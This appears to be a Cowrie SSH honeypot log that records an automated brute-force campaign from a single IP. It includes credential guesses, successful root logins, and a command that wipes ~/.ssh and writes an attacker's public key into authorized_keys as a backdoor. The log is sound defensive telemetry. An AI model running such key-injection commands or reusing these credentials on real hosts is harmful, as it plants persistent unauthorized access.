{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.482714Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.773936Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.775168Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:22:34.841784Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.842524Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:22:34.843509Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.046634Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39500,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d4fb0890a1f","protocol":"ssh","message":"New connection: 212.227.235.229:39500 (1.2.3.4:22) [session: 0d4fb0890a1f]","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.061424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.062360Z","src_ip":"212.227.235.229","session":"0d4fb0890a1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55036,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e9c8cd3d3e2","protocol":"ssh","message":"New connection: 212.227.235.229:55036 (1.2.3.4:22) [session: 0e9c8cd3d3e2]","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.307583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.308573Z","src_ip":"212.227.235.229","session":"0e9c8cd3d3e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.351513Z","src_ip":"212.227.235.229","session":"0d4fb0890a1f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:22:35.471449Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.472161Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.560398Z","src_ip":"212.227.235.229","session":"0e9c8cd3d3e2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.677108Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.678092Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34494,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e7598ead5e2","protocol":"ssh","message":"New connection: 212.227.235.229:34494 (1.2.3.4:22) [session: 6e7598ead5e2]","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.879602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:35.880371Z","src_ip":"212.227.235.229","session":"6e7598ead5e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:36.082443Z","src_ip":"212.227.235.229","session":"6e7598ead5e2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:22:36.551764Z","src_ip":"212.227.235.229","session":"0d4fb0890a1f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:22:36.931296Z","src_ip":"212.227.235.229","session":"6e7598ead5e2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:22:37.224019Z","src_ip":"212.227.235.229","session":"0e9c8cd3d3e2"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:37.843888Z","src_ip":"212.227.235.229","session":"0d4fb0890a1f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.135159Z","src_ip":"212.227.235.229","session":"6e7598ead5e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58032,"dst_ip":"1.2.3.4","dst_port":22,"session":"072565676391","protocol":"ssh","message":"New connection: 212.227.235.229:58032 (1.2.3.4:22) [session: 072565676391]","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.141523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.142543Z","src_ip":"212.227.235.229","session":"072565676391"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55484,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ddcefb9f001","protocol":"ssh","message":"New connection: 212.227.235.229:55484 (1.2.3.4:22) [session: 1ddcefb9f001]","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.338804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.339990Z","src_ip":"212.227.235.229","session":"1ddcefb9f001"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.438516Z","src_ip":"212.227.235.229","session":"072565676391"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.475301Z","src_ip":"212.227.235.229","session":"0e9c8cd3d3e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.543418Z","src_ip":"212.227.235.229","session":"1ddcefb9f001"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55050,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3c507bcf951","protocol":"ssh","message":"New connection: 212.227.235.229:55050 (1.2.3.4:22) [session: b3c507bcf951]","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.724866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.725704Z","src_ip":"212.227.235.229","session":"b3c507bcf951"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:38.976285Z","src_ip":"212.227.235.229","session":"b3c507bcf951"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:22:39.401440Z","src_ip":"212.227.235.229","session":"1ddcefb9f001"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:39.605988Z","src_ip":"212.227.235.229","session":"357f3dca1030"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:39.606996Z","src_ip":"212.227.235.229","session":"1ddcefb9f001"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:22:39.664860Z","src_ip":"212.227.235.229","session":"072565676391"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:39.959489Z","src_ip":"212.227.235.229","session":"14ea9962a59e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:39.961607Z","src_ip":"212.227.235.229","session":"072565676391"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:22:40.021816Z","src_ip":"212.227.235.229","session":"b3c507bcf951"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:40.276747Z","src_ip":"212.227.235.229","session":"b3c507bcf951"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:22:40.527187Z","src_ip":"212.227.235.229","session":"b869ede5beb8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53944,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a7e266eb673","protocol":"ssh","message":"New connection: 212.227.235.229:53944 (1.2.3.4:22) [session: 6a7e266eb673]","sensor":"my-vps","timestamp":"2025-09-08T22:22:58.658067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:22:58.658909Z","src_ip":"212.227.235.229","session":"6a7e266eb673"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:22:58.989367Z","src_ip":"212.227.235.229","session":"6a7e266eb673"}
{"eventid":"cowrie.login.failed","username":"webtest","password":"webtest@123","message":"login attempt [webtest/webtest@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:23:00.345219Z","src_ip":"212.227.235.229","session":"6a7e266eb673"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:23:01.676401Z","src_ip":"212.227.235.229","session":"6a7e266eb673"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48774,"dst_ip":"1.2.3.4","dst_port":22,"session":"906ac787a00a","protocol":"ssh","message":"New connection: 212.227.235.229:48774 (1.2.3.4:22) [session: 906ac787a00a]","sensor":"my-vps","timestamp":"2025-09-08T22:23:01.703513Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:23:01.813993Z","src_ip":"212.227.235.229","session":"906ac787a00a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-n